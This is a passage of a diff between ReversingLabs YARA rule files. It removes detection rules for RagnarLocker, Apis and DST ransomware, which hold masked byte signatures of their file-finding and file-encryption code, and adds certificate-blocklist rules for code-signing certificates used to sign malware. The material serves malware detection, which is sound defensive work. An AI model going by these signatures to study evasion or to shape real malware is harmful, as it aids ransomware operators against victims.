+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14804-L14820"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Y.L. Knafo, Ltd." and pe.signatures [ i ] . serial == "19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RagnarLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "14a292da-36c1-5a37-b27e-20c982e44c25"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14822-L14838"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748"
+		logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RagnarLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57
-            8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3
-        }
-		$find_files_p2 = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
-            ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            56 FF D3
-        }
-		$find_files_p3 = {
-            33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ??
-            53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9
-            ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B
-            E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-        }
-		$encrypt_files_p2 = {
-            8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ??
-            ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ??
-            50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ??
-            ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ??
-            ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ??
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ??
-            ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ??
-            ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85
-        }
-		$encrypt_files_p3 = {
-            0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ??
-            0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Apex Tech, SIA" and pe.signatures [ i ] . serial == "7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Apis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63791250-e21e-53d1-932c-9b5d16a7cad9"
-		date = "2021-11-25"
-		modified = "2021-11-25"
+		id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14840-L14856"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef"
+		logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Apis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
-            69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ??
-            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-            ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ??
-            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ??
-            ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11
-            ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ??
-            28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28
-            ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39
-            ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ??
-            28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E
-            69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
-            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$setup_env = {
-            28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ??
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DST ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bcc9933d-14eb-5f83-a136-5f009c7a3282"
-		date = "2021-12-06"
-		modified = "2021-12-06"
+		id = "d468530e-8a51-583e-a108-e409f0144165"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14858-L14874"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880"
+		logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DST"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
-            ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48
-            89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ??
-            31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB
-            0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85
-            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D
-        }
-		$encrypt_files_p2 = {
-            48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
-            ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ??
-            48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ??
-            ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48
-            8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48
-        }
-		$encrypt_files_p3 = {
-            C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D
-            4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C
-            24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
-            DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74
-            24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F
-            85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ??
-            ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24
-            ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
-            ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
-            DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42
-            ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48
-        }
-		$encrypt_files_p4 = {
-            89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ??
-            E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48
